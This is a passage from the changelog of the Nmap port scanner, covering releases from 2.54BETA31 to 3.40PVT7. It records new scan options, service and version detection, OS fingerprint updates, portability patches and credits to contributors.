o Added/fixed numerous service fingerprints thanks to submissions from
Brian Hatch, HD Moore, Anand R., and some of my own testing. The
number of match lines in this version grows from 137 to 164! Please
keep 'em coming!

o Various important and not-so-important fixes for bugs I encountered
while test scanning.

o The RPC grinder no longer prints a startup message if it has no
RPC-detected ports to scan.

o Some of the service fingerprint length limitations are relaxed a bit
if you enable debugging (-d).

Nmap 3.40PVT7

o Added a whole bunch of services submitted by Brian Hatch
(bri(a)ifokr.org). I also added a few Windows-related probes.
Nmap-service-probes has gone from 101 match strings to 137. Please
keep the submissions coming.

o The question mark now only appears for ports in the OPEN state and
when service detection was requested.

o I now print a separator bar between service fingerprints when Nmap
prints more than one for a given host so that users understand to
submit them individually (suggested by Brian Hatch (bri(a)ifokr.org))

o Fixed a bug that would cause Nmap to print "empty" service
fingerprints consisting of just a semi-colon. Thanks to Brian Hatch
(bri(a)ifokr.org) for reporting this.

Nmap 3.40PVT6

o Banner-scanned hundreds of thousands of machines for ports
21,23,25,110,3306 to collect default banners. Where the banner made
the service name/version obvious, I integrated them into
nmap-service-probes. This increased the number of 'match' lines from
27 to more than 100.

o Created the service fingerprint submission page at
http://www.insecure.org/cgi-bin/servicefp-submit.cgi

o Changed the service fingerprint format slightly for easier
processing by scripts.

o Applied a large portability patch from Albert Chin-A-Young
(china(a)thewrittenword.com). This cleans up a number of things,
particularly for IRIX, Tru64, and Solaris.

o Applied NmapFE patch from Peter Marschall (peter(a)adpm.de) which
"makes sure changes in the relay host and scanned port entry fields
are displayed immediately, and also keeps the fields editable after
de- and reactivating them."

Nmap 3.40PVT4

o Limited the size of service fingerprints to roughly 1024 bytes.
This was suggested by Niels Heinen (niels(a)heinen.ws), because the previous
limit was excessive. The number of fingerprints printed is also now
limited to 10.

o Fixed a segmentation fault that could occur when ping-scanning large
networks.

o Fixed service scan to gracefully handle host_timeout occurrences when
they happen during a service scan.

o Fixed a service_scan bug that would cause an error when hosts send
data and then close() during the NULL probe (when we haven't sent
anything).

o Applied a patch from Solar Designer (solar(a)openwall.com) which
corrects some errors in the Russian man page translation and also a
couple typos in the regular man page. Then I spell-checked the man
page to reduce future instances of foreigners sending in diffs to
correct my English :).

Nmap 3.40PVT3

o Nmap now prints a "service fingerprint" for services that it is
unable to match despite returning data. The web submission page it
references is not yet available.

o Service detection now does RPC grinding on ports it detects to be
running RPC.

o Fixed a bug that would cause Nmap to quit with an Nsock error when
--host_timeout was used (or when -T5 was used, which sets it
implicitly).

o Fixed a bug that would cause Nmap to fail to print the OS
fingerprint in certain cases. Thanks to Ste Jones
(root(a)networkpenetration.com) for the problem report.

Nmap 3.40PVT2

o Nmap now has a simple VERSION detection scheme. The 'match' lines in
nmap-service-probes can specify a template version string
(referencing subexpression matches from the regex in a Perl-like
manner) so that the version is determined at the same time as the
service. This handles many common services in a highly efficient
manner. A more complex form of version detection (that initiates
further communication w/the target service) may be necessary
eventually to handle services that aren't as forthcoming with
version details.

o The Nmap port state table now wastes less whitespace due to using a new
and stingy NmapOutputTable class. This makes it easier to read, and
also leaves more room for version info and possibly other enhancements.

o Added 's' option to match lines in nmap-service-probes. Just as
with the Perl 's' option, this one causes '.' in the regular
expression to match any character INCLUDING newline.

o The WinPcap header timestamp is no longer used on Windows as it
sometimes can be a couple seconds different than gettimeofday() (which
is really _ftime() on Windows) for some reason. Thanks to Scott
Egbert (scott.egbert(a)citigroup.com) for the report.

o Applied a patch by Matt Selsky (selsky(a)columbia.edu) which fixes
configure.in in such a way that the annoying header file "present but
cannot be compiled" warning for Solaris.

o Applied another patch from Matt that (we hope) fixes the "present
but cannot be compiled" warning -- this time for Mac OS X.

o Port table header names are now capitalized ("SERVICE", "PORT", etc)

Nmap 3.40PVT1

o Initial implementation of service detection. Nmap will now probe
ports to determine what is listening, rather than guessing based on
the nmap-services table lookup. This can be very useful for
services on unidentified ports and for UDP services where it is not
always clear (without these probes) whether the port is really open
or just firewalled. It is also handy for when services are run on
the well-known-port of another protocol -- this is happening more
and more as users try to circumvent increasingly strict firewall
policies.

o Nmap now uses the excellent libpcre (Perl Compatible Regular
Expressions) library from http://www.pcre.org/ . Many systems
already have this, otherwise Nmap will use the copy it now includes.
If your libpcre is hidden away in some nonstandard place, give
./configure the new --with-libpcre=DIR directive.

o Nmap now uses the C++ Standard Template Library (STL). This makes
programming easier, but if it causes major portability or bloat
problems, I'll reluctantly remove it.

o Applied a patch from Javier Kohen (jkohen(a)coresecurity.com) which
normalizes the names of many Microsoft entries in the
nmap-os-fingerprints file.

o Applied a patch by Florin Andrei (florin(a)sgi.com) to the Nmap RPM
spec file. This uses the 'Epoch' flag to prevent the Redhat Network
tool from marking my RPMs as "obsolete" and "upgrading" to earlier
Redhat-built versions. A compilation flag problem is also fixed.

Nmap 3.30

o Implemented the largest-ever OS fingerprint update! Roughly 300
fingerprints were added/modified. These massive changes span the
gamut from AIX 5.1 to the ZyXEL Prestige broadband router line.
Notable updates include OpenBSD 3.3, FreeBSD 5.1, Mac OS X 10.2.6,
Windows 2003 server, and more WAPs and broadband routers than you
can shake a stick at. Someone even submitted a fingerprint for
Debian Linux running on the Microsoft Xbox. You have to love that
irony :). Thanks to everyone who submitted fingerprints using the
URL Nmap gives you when it gets a clean reading but is stumped. The
fingerprint DB now contains almost 1000 fingerprints.

o Went through every one of the fingerprints to normalize the
descriptions a bit. I also looked up what all of the devices are
(thanks E*Bay and Google!). Results like "Nexland ISB Pro800 Turbo"
and "Siemens 300E Release 6.5" are much more useful when you add the
words "cable modem" and "business phone system"

o Added a new classification system to nmap-os-fingerprints. In
addition to the standard text description, each entry is now
classified by vendor name (e.g. Sun), underlying OS (e.g. Solaris),
OS generation (e.g. 7), and device type ("general purpose", router,
switch, game console, etc). This can be useful if you want to (say)
locate and eliminate the SCO systems on a network, or find the
wireless access points (WAPs) by scanning from the wired side.

o Classification system described above is now used to print out a
"device type" line and OS categories for matches. The free-form
English details are still printed as well. Nmap can sometimes
provide classifications even where it used to provide nothing
because of "too many matches". These have been added to XML output
as well. They are not printed for the "grepable output", as I
consider that format deprecated.

o Nmap will now sometimes guess in the "no exact matches" case, even
if you don't use the secret --osscan_guess or -fuzzy options.

o Applied another huge NmapFE patch from Peter Marschall
(peter(a)adpm.de). This revamps the interface to use a tabbed
format that allows for many more Nmap options to be used. It also
cleans up some crufty parts of the code. Let me and Peter know what
you think (and if you encounter any problems).

o Windows and Amiga ports now use packet receive times from libpcap.
Let me know if you get any "time computation problem" errors.

o Updated version of the Russian man page translation from Alex Volkov
(alex(a)cherepovets-city.ru).

Nmap 3.28

o Fixed (I hope) an issue that would cause Nmap to print "Serious time
computation problem in adjust_timeout ..." and quit. The ultimate
cause was demonstrated by this --packet_trace snippet that Russel
Miller (rmiller(a)duskglow.com) sent me:
SENT (0.0500s) ICMP 0.0.0.0 > 127.0.0.1 Echo request (type=8/code=0) ...
RCVD (0.0450s) ICMP 127.0.0.1 > 127.0.0.1 Echo reply (type=0/code=0) ...
As you can see, the ping reply appears to come BEFORE the request
was sent(!). This sort of thing happens on at least Linux and
Windows. The send time is obtained from gettimeofday(timeval, NULL),
while receive time libpcap packet header. If anyone knows why this
occurs, or (even better) knows a good way to fix it, let me know.
For now, I am allowing the response to come up to .05s "before" the
request. That is gross.

o For years, Nmap has added -I/usr/local/include and -L/usr/local/lib
to the compiler line to grab local libraries. I have removed this
behavior by default, and added a '--with-localdirs' configure option
that adds it back. If Nmap fails to compile now without the above
option, please let me know. I can change the default back if this
change causes more problems than it solves. People (such as certain
ports tree packagers) who know they don't want /usr/local should
specify --without-localdirs rather than relying on that always being
the default.

o Fixed (I hope) a problem that led to the error message "Assertion
`tqi->sockets[probe_port_num][seq] == -1' failed".

o Fixed a problem that would cause Nmap on Windows to send ICMP ping
packets from 0.0.0.0 instead of the appropriate source IP. Thanks
to Yeti (boxed(a)blueyonder.co.uk) for the report.

o Applied some changes from Solar Designer (solar(a)openwall.com)
which fix some typos and also suggest safer /tmp/ behavior in the
HACKING file and Lithuanian man page. These changes are for the
Nmap package of his Openwall GNU/*/Linux (Owl) distribution.
[ http://www.openwall.com/Owl/ ]

o For Solaris, I now define NET_SIZE_T to size_t rather than socklen_t
in nmap.h. Isn't that exciting?!!! Hopefully this will help
compilation on Solaris 2.6 (and perhaps earlier). If any Solaris
users notice new compilation problems, please let me know. Thanks to
Al Smith (Al.Smith(a)aeschi.ch.eu.org) for reporting the issue.

o Removed an errant getopt() prototype in nbase/getopt.h which should
hopefully improve compilation on certain Solaris boxes and BSD
variants.

o SCO operating systems are no longer supported due to their recent
(and absurd) attacks against Linux and IBM. Bug reports relating to
UnixWare will be ignored, or possibly even laughed at derisively.
Note that I have no reason to believe anyone has ever used Nmap on
SCO systems. UnixWare and OpenServer suck.

o Fixed a problem with small --max_parallelism values when non-root ping
scanning that would cause Nmap to say "sendconnecttcpquery: Could
not scavenge a free socket!" and quit. Problem was reported by
Justin A (justin(a)bouncybouncy.net) as Debian Bug #195463.

o Applied (with a few modifications) a large NmapFE patch from Peter
Marschall (peter(a)adpm.de). This patch adds a bunch more scan/ping
options and cleans up some redundant NmapFE code.

o Included new Russian man page translation by Alex Volkov
(alex(a)cherepovets-city.ru)

o Changed many single-quotes (') into double quotes (") in the man
page due to a disagreement over whether to represent them as (') or
(\') in nroff.

o Included --packet_trace support for Explicit Congestion Notification
(RFC 2481/3168) flags thanks to a patch sent in by Maik Pfeil
(root(a)bundesspionageministerium.de)

o Included --packet_trace support for a few (unusual) ICMP types in
case Nmap receives them. The patch was also sent by Maik Pfeil.

o Fixed a problem with redirecting XML/Grep/Machine output to stdout
on Windows (e.g. -oX - ). Problem was reported by Wei Jiang
(Wei.Jiang(a)bindview.com)

o Made "-g -Wall" compiler flags dependent on availability of gcc/g++
sine some other compilers do not support them.

o I spam-protected the email addresses in this file. I fervently hope
that within 5 years we will be able to defeat this scourge through
technology and laws, so that we may again list our email addresses
openly without fear of abuse by criminal spammers. Oh, and it would
be a shame if the spiders went through this whole page and only
found uce@ftc.gov, rhundt@fcc.gov, jquello@fcc.gov, sness@fcc.gov,
president@whitehouse.gov, haesslich@loyalty.org, and rchong@fcc.gov.

Nmap 3.27

o Nmap now compiles under Amiga thanks to patches sent by Diego
Casorran (dcr8520(a)amiga.org).

o Fixed a backwards WIN32 ifdef that broke UDP and small-fragment
scans for some operating systems other than Linux and Windows.
Thanks to Guido van Rooij (guido(a)gvr.org) for reporting the problem
and sending a patch.

o Applied patch from Marius Strobl (marius(a)alchemy.franken.de) which improves
the definition of NET_SIZE_T on FreeBSD so that it compiles on
64-bit platforms.

Nmap 3.26

o Fixed Mac OS X Compilation (at least on most of the machines
tested). You will probably need to type
"./configure CPP=/usr/bin/cpp" instead of simply "./configure". If
you still have trouble, drop me an email. Thanks to everyone who
provided or offered shell accounts!

o Fixed a segmentation fault several people reported that was
introduced in 3.25. This problem manifests itself intermittently
in many normal situations involving large-network scanning. So all
3.25 users are urged to upgrade. Pre-3.25 users should upgrade too,
since 3.25 included so many improvements :).

Nmap 3.25

o I added UDP-based "ping" scanning. The -PU option can take an
optional portlist like the TCP "ping" options (-PS, -PA), but it sends
a UDP packet to the targets and expects hosts that are up to reply
with a port unreachable (or possibly a UDP response if the port is
open). This one is likely to work best against closed ports, since
many open ports don't respond to empty requests.

o Fixed (I hope) problem where Nmap would abort, complaining that
"Assertion `pt->down_this_block > 0' failed". Thanks to
ray(a)24hoursecurity.org and mugz(a)x-mafia.com for reporting and
helping me debug this problem.

o Fixed a GCC dependency reported by Ayamura Kikuchi
(ayamura(a)keio.net)

o Fixed an "assertion failure" which would cause Nmap to exit when you
specify a --max_rtt_timeout below 3000. Thanks to Tammy Rathbun
(rathbun2(a)llnl.gov) and Jan Roger Wilkens (jrw(a)proseq.net) for
reporting this.

o Packet receive times are now obtained from libpcap rather than
simply using the time the packets are passed to Nmap. This should
improve performance slightly. I was not able to get this to work
properly on Windows (either pcap or raw) -- join the nmap-dev list
if you have ideas.

o Fixed bug that caused Nmap to ignore certain RST responses when you
do both -PS and -PA.

o Modified ping scan to work better when many instances of Nmap are
executed concurrently.

o I'm now linking directly to the gzip compressed version of Nmap on
the homepage as well as the .bz2.

o Fixed a portability problem that caused BSD Make to bail out.

o Fixed a divide by zero error caused when non-root users (on UNIX)
explicitly request ICMP pings (which require root privileges). Now it
prints a warning and uses the normal non-root TCP connect() ping.
Jaroslav Sladek (jup(a)matfyz.cz) found the bug and provided the patch.

o Made Nmap more tolerant of corrupt nmap-services and nmap-protocols
files thanks to report & patch sent by Phix (phix(a)hush.com)

o Added some more port numbers sent in by Seth Master
(smaster(a)stanford.edu). He has been a frequent nmap-services
contributor in the last couple months.

o Added --packet_trace support to Windows

o Removed superfluous "addport" line in the XML output (patch from Max
Schubert (nmap(a)webwizarddesign.com)).

o Merged wintcpip.cc into tcpip.cc to avoid the headache of
maintaining many nearly-identical functions.

o Fixed an assertion failure crash related to combining port 0 scans
and OS scan. Thanks to A.Jones(a)mvv.de for reporting this.

o Fixed some compilation problems on systems without IPv6 support --
patch sent by Jochen Erwied (Jochen.Erwied(a)mbs-software.info)

o Applied patch from Jochen Erwied (Jochen.Erwied(a)mbs-software.info)
which fixes the format strings used for printing certain timestamps.

o Upgraded to autoconf 2.57, including the latest config.guess/config.sub

o Renamed configure.ac files to configure.in as recommended by the
latest autoconf documentation.

o Changed the wording of NmapFE Gnome entries to better-comply with
Gnome's Human Interface Guidelines (HIG). Suggested by Axel Krauth
(krauth(a)fmi.uni-passau.de)

Nmap 3.20

o The random IP input option (-iR) now takes an argument specifying
how many IPs you want to scan (e.g. -iR 1000). Specify 0 for the old
never-ending scan behavior.

o Fixed a tricky memory leak discovered by Mugz (mugz(a)x-mafia.com).

o Fixed output truncation problem noted by Lionel CONS (lionel.cons(a)cern.ch)

o Fixed a bug that would cause certain incoming ICMP error messages to
be improperly ignored.

Nmap 3.15BETA3

o Made numerous improvements to the timing behavior of "-T Aggressive"
(same as -T4) scans. It is now recommended for regular use by
impatient people with a fast connection. "-T Insane" mode has also
been updated, but we only recommend that for, well, insane people.

o Made substantial changes to the SYN/connect()/Window scanning
algorithms for improved speeds, especially against heavily filtered
hosts. If you notice any timing problems (misidentified ports,
etc.), please send me the details (including full Nmap output and a
description of what is wrong). Reports of any timing problems with
-T4 would be helpful as well.

o Changed Nmap such that ALL syn scan packets are sent from the port
you specify with -g. Retransmissions used to utilize successively
higher ports. This change has a downside in that some operating
systems (such as Linux) often won't reply to the retransmissions
because they reuse the same connection specifier quad
(srcip:srcport:dstip:dstport). Overall I think this is a win.

o Added timestamps to "Starting nmap" line and each host port scan in
verbose (-v) mode. These are in ISO 8601 standard format because
unlike President Bush, we actually care about International
consensus :).

o Nmap now comes by default in .tar.bz2 format, which compresses about
20% further. You can still find .tgz in the dist directory at
http://download.insecure.org/nmap/dist/?M=D .

o Various other minor bug fixes, new services, fingerprints, etc.

Nmap 3.15BETA2

o I added support for a brand new "port" that many of you may have
never scanned before! UDP & TCP "port 0" (and IP protocol 0) are now
permitted if you specify 0 explicitly. An argument like "-p -40"
would still scan ports 1-40. Unlike ports, protocol 0 IS now scanned
by default. This now works for ping probes too (e.g., -PS, -PA).

o Applied patch by Martin Kluge (martin(a)elxsi.info) which adds --ttl
option, which sets the outgoing IPv4 TTL field in packets sent via
all raw scan types (including ping scans and OS detection). The
patch "should work" on Windows, but hasn't been tested. A TTL of 0
is supported, and even tends to work on a LAN:
14:17:19.474293 192.168.0.42.60214 > 192.168.0.40.135: S 326:326(0) [ttl 0]
14:17:19.474456 192.168.0.40.135 > 192.168.0.42.60214: S 280:280(0) ack 326 (ttl 128)

o Applied patch by Gabriel L. Somlo ( somlo(a)acns.colostate.edu ) which
extends the multi-ping-port functionality to nonroot and IPv6
connect() users.

o I added a new --datadir command line option which allows you to
specify the highest priority directory for Nmap data files
nmap-services, nmap-os-fingerprints, and nmap-rpc. Any files which
aren't in the given dir, will be searched for in the $NMAPDIR
environmental variable, ~/nmap/, a compiled in data directory
(e.g. /usr/share/nmap), and finally the current directory.

o Fixed Windows (VC++ 6) compilation, thanks to patches from Kevin
Davis (computerguy(a)cfl.rr.com) and Andy Lutomirski
(luto(a)stanford.edu)

o Included new Latvian man page translation by
"miscelerious options" (misc(a)inbox.lv)

o Fixed Solaris compilation when Sun make is used rather than GNU
make. Thanks to Tom Duffy (tduffy(a)sun.com) for assistance.

o Applied patch from Stephen Bishop (sbishop(a)idsec.co.uk) which
prevents certain false-positive responses when Nmap raw TCP ping scans
are being run in parallel.

o To emphasize the highly professional nature of Nmap, I changed all
instances of "fucked up" in error message text into "b0rked".

o Fixed a problem with nmap-frontend RPMs that would cause a bogus
/bin/xnmap link to be created (it should only create
/usr/bin/xnmap). Thanks to Juho Schultz
(juho.schultz(a)astro.helsinki.fi) for reporting the problem.

o I made the maximum number of allowed routes and interfaces allowed
on the scanning machine dynamic rather than hardcoded #defines of 1024
and 128. You never know -- some wacko probably has that many :).

Nmap 3.15BETA1

o Integrated the largest OS fingerprint DB updates ever! Thanks to
everyone who contributed signatures! New or substantially modified
fingerprints included the latest Windows 2K/XP changes, Cisco IOS
12.2-based routers and PIX 6.3 firewalls, FreeBSD 5.0, AIX 5.1,
OpenBSD 3.2, Tru64 5.1A, IBM OS/400 V5R1M0, dozens of wireless APs,
VOIP devices, firewalls, printers, print servers, cable modems,
webcams, etc. We've even got some mod-chipped Xbox fingerprints
now!

o Applied NetBSD portability patch by Darren Reed
(darrenr(a)reed.wattle.id.au)

o Updated Makefile to better-detect if it can't make nmapfe and
provide a clearer error message. Also fixed a couple compiler
warnings on some *BSD platforms.

o Applied patch from "Max" (nmap(a)webwizarddesign.com) which adds the
port owner to the "addport" XML output lines which are printed (only
in verbose mode, I think) as each open port is discovered.

o I killed the annoying whitespace that is normally appended after the
service name. Now it is only there when an owner was found via -sI
(in which case there is a fourth column and so "service" must be
exactly 24 characters).

Nmap 3.10ALPHA9

o Reworked the "ping scan" algorithm (used for any scan except -P0 or
-sL) to be more robust in the face of low-bandwidth and congested
connections. This also improves reliability in the multi-port and
multi-type ping cases described below.

o "Ping types" are no longer exclusive -- you can now do combinations
such as "-PS22,53,80 -PT113 -PN -PE" in order to increase your odds of
passing through strict filters. The "PB" flag is now deprecated
since you can achieve the same result via "PE" and "PT" options.

o Applied patch (with modest changes) by Gabriel L. Somlo
(somlo(a)acns.colostate.edu), which allows multiple TCP probe ports in
raw (root) mode. See the previous item for an example.

o Fixed a libpcap compilation issue noted by Josef 'Jupp' Schugt
(deusxmachina(a)webmail.co.za) which relates to the definition (or
lack thereof) of ARPHRD_HDLC (used for Cisco HDLC frames).

o Tweaked the version number (-V) output slightly.

Nmap 3.10ALPHA7

o Upgraded libpcap from version 0.6.2 to 0.7.1. Updated the
libpcap-possiblymodified/NMAP_MODIFICATIONS file to give a much
more extensive list (including diffs) of the changes included
in the Nmap bundled version of Libpcap.

o Applied patch to fix a libpcap alignment bug found by Tom Duffy
(tduffy(a)sun.com).

o Fixed Windows compilation.

o Applied patch by Chad Loder (cloder(a)loder.us) of Rapid7 which
fixes OpenBSD compilation. I believe Chad is now the official
OpenBSD Nmap "port" maintainer. His patch also adjusted
random-scan (-iR) to include the recently allocated 82.0.0.0/8
space.

o Fixed (I hope) a few compilation problems on
non-IPv6-enabled machines which were noted by Josef 'Jupp'
Schugt (jupp(a)gmx.de)

o Included some man page translations which were inadvertently
missed in previous tarballs.

o Applied patch from Matthieu Verbert (mve(a)zurich.ibm.com) which
places the Nmap man pages under ${prefix}/share/man rather than
${prefix}/man when installed via RPM. Maybe the tarball
install should do this too? Opinions?

o Applied patch from R Anderson (listbox(a)pole-position.org) which
improves the way ICMP port unreachables from intermediate hosts
are handled during UDP scans.

o Added note to man page related to Nmap US export control. I
believe Nmap falls under ECCN 5D992, which has no special
restrictions beyond the standard export denial to a handful of
rogue nations such as Iraq and North Korea.

o Added a warning that some hosts may be skipped and/or repeated
when someone tries to --resume a --randomize_hosts scan. This
was suggested by Crayden Mantelium (crayden(a)sensewave.com)

o Fixed a minor memory leak noted by Michael Davis
(mike(a)datanerds.net).

Nmap 3.10ALPHA4

o Applied patch by Max Schubert (nmap(a)webwizarddesign.com) which adds
an add-port XML tag whenever a new port is found open when Nmap is
running in verbose mode. The new tag looks like:
[addport state="open" portid="22" protocol="tcp"/]
I also updated docs/nmap.dtd to recognize this new tag.

o Added German translation of Nmap man page by Marc Ruef
(marc.ruef(a)computec.ch). It is also available at
http://www.insecure.org/nmap/data/nmap_manpage-de.html

o Includes a brand new French translation of the man page by Sebastien
Blanchet. You could probably guess that it is available at
http://www.insecure.org/nmap/data/nmap_manpage-fr.html

o Applied some patches from Chad Loder (cloder(a)loder.us) which update
the random IP allocation pool and improve OpenBSD support. Some
were from the OBSD Nmap patchlist.

o Fixed a compile problem on machines without PF_INET6. Thanks to
Josef 'Jupp' Schugt (deusxmachina(a)webmail.co.za) for noting this.

Nmap 3.10ALPHA3

o Added --min_parallelism option, which makes scans more aggressive
and MUCH faster in certain situations -- especially against
firewalled hosts. It is basically the opposite of --max_parallelism
(-M). Note that reliability can be lost if you push it too far.

o Added --packet_trace option, which tells Nmap to display all of the
packets it sends and receives in a format similar to tcpdump. I
mostly added this for debugging purposes, but people wishing to learn
how Nmap works or for experts wanting to ensure Nmap is doing
exactly what they expect. If you want this feature supported under
Windows, please send me a patch :).

o Fixed a segmentation fault in Idlescan (-sI).

o Made Idlescan timing more conservative when -P0 is specified to
improve accuracy.

o Fixed an infinite-loop condition that could occur during certain
dropped-packet scenarios in an Idle scan.

o Nmap now reports execution times to millisecond precision (rather
than rounding to the nearest second).

o Fixed an infinite loop caused by invalid port arguments. Problem
noted by fejed (fejed(a)uddf.net).

Nmap 3.10ALPHA2

o Fixed compilation and IPv6 support on FreeBSD (tested on
4.6-STABLE). Thanks to Niels Heinen (niels.heinen(a)ubizen.com) for
suggestions.

o Made some portability changes based on suggestions by Josef 'Jupp'
Schugt (jupp(a)gmx.de)

o Fixed compilation and IPv6 support on Solaris 9 (haven't tested
earlier versions).

Nmap 3.10ALPHA1

o IPv6 is now supported for TCP scan (-sT), connect()-style ping
scan (-sP), and list scan (-sL)! Just specify the -6 option and the
IPv6 numbers or DNS names. Netmask notation is not currently
supported -- I'm not sure how useful it is for IPv6, where even petty
end users may be allocated trillions of addresses (/80). If you
need one of the scan types that hasn't been ported yet, give
Sebastien Peterson's patch a try at http://nmap6.sourceforge.net/ .
If there is demand, I may integrate more of that into Nmap.

o Major code restructuring, which included conversion to C++ -- so
you'll need g++ or another C++ compiler. I accidentally let a C++
requirement slip in a while back and found that almost everyone has
such a compiler. Windows (VC++) users: see the README-WIN32 for new
compilation instructions.

o Applied patch from Axel Nennker (Axel.Nennker(a)t-systems.com) which
adds a --without-nmapfe option to the configure script. This is
useful if your system doesn't have the proper libraries (e.g. GTK) or
if you think GUIs are for sissies :).

o Removed arbitrary max_parallelism (-M) limitations, as suggested by
William McVey ( wam(a)cisco.com ).

o Added DEC OSF to the platforms that require the BSDFIX() macro due
to taking IP length and offset fields in host rather than network byte
order. Suggested by Dean Bennett (deanb(a)gbtn.net)

o Fixed an debug statement C ambiguity discovered by Kronos
(kronos(a)kronoz.cjb.net)

Nmap 3.00

o Woohoo! :)

Nmap 2.99RC2

o Fixed an important memory initialization bug which was causing
crashes on Mac OS X (and possibly other platforms). The problem was
located by Pieter ten Pierick (P.tenPierick(a)chello.nl)

o Various minor bugfixes/cleanup

Nmap 2.99RC1

o Implemented the biggest OS fingerprint update since December 1999!
More than 200 fingerprints were added/modified. This includes
OpenBSD 3.1, Solaris 9, Mac OS 10.1.5, OS/400, FreeBSD 4.6, The
latest MS WinXP changes, new CISCO equiptment, and loads of network
devices such as VoIP phones, switches, printers, WAPs, etc.

o Updated build system to work on MacOS X.

o I removed "credit" lines from the nmap-os-fingerprints file out of
concern that evil spammers might harvest the 602 addresses. Plus
those took up 28K and the size of nmap-os-fingerprints has already
caused trouble for some handheld devices. If anyone actually cares
about the "fame" of being listed, let me know and I'll put you back
in. I still appreciate everyone who submits fingerprints! I just
don't want you to be spammed when the fingerprint file goes online.

o Minor usage screen (nmap -h) fix suggested by Martin Kluge
( martin(a)elxsi.info )

o Insured that the initial pound (#) in C preprocessor directives is
always in column 1 (portability fix). Problem noted by Shamsher
Sran (ssran(a)bechtel.com)

Nmap 2.54BETA37

o Made SYN scan the default for privileged (root) users. This offers
far better performance for Windows users due to their broken
connect() call, and is usually even preferred on UNIX because it is
more stealthy and less likely to crash applications listening on the
target host.

o Fixed a problem noted by Ping Huang (pshuang(a)alum.mit.edu) relating
to -PI scans of a machine's own non-localhost interfaces (eg
scanning your ethernet address).

o Applied patch from Patrice Goetghebeur (pgoetghebeur(a)mac.com) which
fixes PPP/SLIP support on Mac OS X.

o Applied dozens of nmap-services portnumber mapping updates
researched and sent by palante(a)subterrain.net

o Updated nmap-rpc to the latest version from Eilon Gishri
(eilon(a)aristo.tau.ac.il)

o Fixed --resume option to better detect all of the previously scanned
hosts in an -oN file (bug report from Adam.Scott(a)predictive.com )

o Adjusted random IP generator (for -iR) to account for newly
allocated ip space from
http://www.iana.org/assignments/ipv4-address-space as noted by Chad
Loder (cloder(a)acm.org)

o Updated config.sub and config.guess to the versions in
automake-1.6.2 .

o Applied patch from Markus A. Nonym (g17m0(a)lycos.com) which checks
for a recent version of GTK+ in ./configure before even trying to
build NmapFE (avoids the previous ugly compiler errors).

o Applied patch from benkj(a)gmx.it which fixes misbehavior when Nmap
would receive EOF (including ^D) in interactive mode.

o Fixed format string bugs (not the security-related kind) found by
Takehiro YONEKURA (yonekura(a)obliguard.com) and Kuk-hyeon Lee
(errai(a)inzen.com)

o Applied patch from Greg Steuck (greg-nmap-dev(a)nest.cx) which fixes
an alignment problem in charpool.c that could cause bus errors on
64-bit platforms.

o Applied portability fix patch from Matt Christian (mattc(a)visi.com)

Nmap 2.54BETA36

o Fixed major connect scan problem introduced in BETA35

o Changed NmapFE to use the version number 2.54BETA36 rather than
0.2.54BETA36. I had to do this because RedHat took the liberty of
releasing a so-called "2.54BETA31" version of nmap-frontend in their
7.3 distribution. Thus my upgrades were failing to install on such
systems because a "later" version is already installed.

Nmap 2.54BETA35

o Fixed an issue that could cause the abort message "Serious time
computation problem in adjust_timeout ...". If you still see this,
please let me know.

o Fixed Windows compilation (and I really mean it this time -- tested
myself).

o Applied configure script patch to recognize Solaris 2.10 when it
eventually becomes available (from James Carlson
(james.d.carlson(a)east.sun.com)

o Applied some portability fixes from Albert Chin
(china(a)thewrittenword.com)

o Applied libpcap aclocal.m4 patch to enable debugging (-g) when
compiling libpcap with gcc. Patch from Ping Huang
(pshuang(a)alum.mit.edu)

o Restructured "TCP probe port" output message a bit as suggested by
Ping Huang (pshuang(a)alum.mit.edu)

Nmap 2.54BETA34

o Windows compilation fixed thanks to new VC++ project file (nmap.dsp) sent
by Evan Sparks (gmplague(a)sdf.lonestar.org) (I had forgotten to include
the new main.c).

o Various nmap-services updates

o Fixed a bunch of typos and capitalization issues in
nmap-os-fingerprints by applying patch sent in by Royce Williams
(royce(a)alaska.net).

Nmap 2.54BETA33

o Tons of OS fingerprint updates. More than 100 fingerprints added or
changed, including OpenBSD 3, FreeBSD 4.5, Solaris 9 pre-release,
Commodor 64 (with the TFE Ethernet Card and uIP stack), Compaq iPAQ,
Cisco IOS 12.2(8), AIX 5.1, IRIX 6.5.15, various
Redback/Racal/Juniper/BigIP/HP/Siemens/Brocade/Quantum devices,
numerous printers/switches, KRONOS network clock, WTI Network Power
Switch, Windows XP, and many more. Thanks to everyone who
contributed!

o Applied fix for an important RPC scanning bug sent in by Pasi Eronen
(pasi.eronen(a)nixu.com)

o Applied fix for nasty OS fingerprinting bug found by William
Robertson (wkr(a)cs.ucsb.edu)

o Do not show uptime when obviously spoofed (eg OpenBSD 3.0)

o Slightly changed (I hope improved) the whitespace in Nmap output so
that messages relating to the same host are kept together (and
different hosts different separated by newlines).

o Moved main() function into a new file, cleverly named main.c.

Nmap 2.54BETA32

o Applied Windows pinging fix and from Andy Lutomirski
(Luto(a)myrealbox.com)

o Applied a few more Windows fixes from Andy.

o Fixed a flaw in several error-checking statements noted by Giacomo
Cariello (jwk(a)bug.it)

o Applied Win32 compilation fixes sent by Kirby Kuehl (kkuehl(a)cisco.com)
and jens.vogt(a)bluewin.ch

Nmap 2.54BETA31

o Added ICMP Timestamp and Netmask ping types (-PP and -PM). These
(especially timestamp) can be useful against some hosts that do not
respond to normal ping (-PI) packets.

o Documented the --data_length option and made it work with all the
ICMP ping types (echo request, netmask, and timestamp).

o Added check for strings.h before including it in portlist.c . This
fixes a compilation problem on some versions of Windows. Problem
first noted by Michael Vorin (mvorin(a)hotmail.com)

o Applied patch from Andy Lutomirski (Luto(a)myrealbox.com) which fixes
a crash on some Windows platforms when timeouts occur.

o Fixed "grepable output" (-oG) so that it prints IPID sequence class
rather than printing the TCP ISN sequence index twice. Problem
noted by Russell Fulton (r.fulton(a)auckland.ac.nz)

o Added mysterious, undocumented --scanflags option.

o Applied patch from Andy Lutomirski (Luto(a)myrealbox.com) which fixes
some important Windows bugs. Apparently this can cause a dramatic
speedup in some circumstances. The patch had other misc. changes
too.

o Fix bug noted by Chris V (iselldrugstokidsonline(a)yahoo.com) in which
Nmap could segmentation fault with the (bogus) command: './nmap -sO
-p 1-65535 hostname' (protocol only can go up to 255). That being
said, Nmap should never segfault just because of bogus options.

o Fixed problem noted by Maximiliano (emax25(a)arnet.com.ar) where Nmap
would get stuck in a (nearly) infinite loop when you try to "resume"
a random host (-iR) scan.

o Included a number of fingerprint updates, but I still have many more
web submissions to go through. Also made some nmap-services
portlist updates.

